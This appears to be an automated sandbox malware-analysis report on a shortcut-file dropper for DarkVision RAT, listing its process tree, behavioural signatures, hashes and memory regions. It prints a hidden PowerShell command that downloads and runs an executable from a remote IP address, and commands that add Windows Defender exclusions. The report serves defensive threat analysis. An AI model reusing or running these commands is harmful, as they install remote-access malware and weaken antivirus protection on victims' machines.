Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-12-2024 02:42

General

  • Target

    b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d.lnk

  • Size

    2KB

  • MD5

    4dab3e7b78ccfc190b36eb728b6e74d0

  • SHA1

    296f5169adbc438e4ec1610d46c0f451417b7b71

  • SHA256

    b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d

  • SHA512

    227e416b6f1f3e465d02da79c9683348d7e26c016fc7c9aa37b9e11189ecb351f0f9d992548182af6831b56e81f2301bd6169ba539aa203457b0823d27a11ee0

Malware Config

Signatures

  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3872
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3388
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4516
        • C:\ProgramData\explorers\explorers.exe
          "C:\ProgramData\explorers\explorers.exe" {8ACDE7F8-56B2-461C-B2DA-0AAADBA16242}
          4⤵
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4536
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4840
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            5⤵
            • Checks BIOS information in registry
            • Drops startup file
            PID:1220

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    70595b5937369a2592a524db67e208d3

    SHA1

    d989b934d9388104189f365694e794835aa6f52f

    SHA256

    be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

    SHA512

    edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    fd9152fd0fab56908fe168af91a08303

    SHA1

    e4e64d449aaae4e5cda388fc492ff8ee0878af24

    SHA256

    a78dca0d470c353064c51dbe58a9bf408c188b65d44636759aace9011f5b482e

    SHA512

    c29093187dcc35ba79e20c11a00ad4063cb81bf7b0bc269f3aee66f583ebece5821cf1ac8748e49247a8eb0eccf4e47f5eb4c1f8577327d8a754a807d5a4aa16

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mbqavwvl.quj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\file.exe

    Filesize

    4.1MB

    MD5

    a3a87410c13cc37b48a9d63d84798a26

    SHA1

    170685b36ce0c7ca791b80886e88f3955a707527

    SHA256

    bbb59f158a76d0b043c7d050bba4c4ad82b94d383f9db265119a24360d7279e4

    SHA512

    1e7071749d1e96674a6a802a6317e7f71350975516f0c75fe0d0f6d987ad5d6db91ff6cba43a8c03117ddaeccc2ac40e97f10f2cba20204a645e9369fb38b543

  • memory/628-2-0x00007FF8A8573000-0x00007FF8A8575000-memory.dmp

    Filesize

    8KB

  • memory/628-12-0x0000022872DF0000-0x0000022872E12000-memory.dmp

    Filesize

    136KB

  • memory/628-13-0x00007FF8A8570000-0x00007FF8A9031000-memory.dmp

    Filesize

    10.8MB

  • memory/628-14-0x00007FF8A8570000-0x00007FF8A9031000-memory.dmp

    Filesize

    10.8MB

  • memory/628-26-0x00007FF8A8570000-0x00007FF8A9031000-memory.dmp

    Filesize

    10.8MB

  • memory/1220-74-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-63-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-66-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-64-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-62-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-60-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-57-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-68-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-77-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-76-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-73-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-81-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-82-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-95-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-46-0x00000000004F0000-0x00000000004F1000-memory.dmp

    Filesize

    4KB

  • memory/1220-80-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-79-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-78-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-72-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-75-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-98-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-70-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-69-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-67-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-65-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-47-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-61-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-71-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-56-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-54-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-59-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-58-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/1220-55-0x00000000027F0000-0x0000000002C10000-memory.dmp

    Filesize

    4.1MB

  • memory/3872-23-0x00007FF7E8850000-0x00007FF7E8C70000-memory.dmp

    Filesize

    4.1MB

  • memory/3872-32-0x00007FF7E8850000-0x00007FF7E8C70000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-104-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-106-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-100-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-101-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-102-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-103-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-33-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-99-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-107-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-108-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-109-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-110-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-111-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-112-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4536-113-0x00007FF7D5EB0000-0x00007FF7D62D0000-memory.dmp

    Filesize

    4.1MB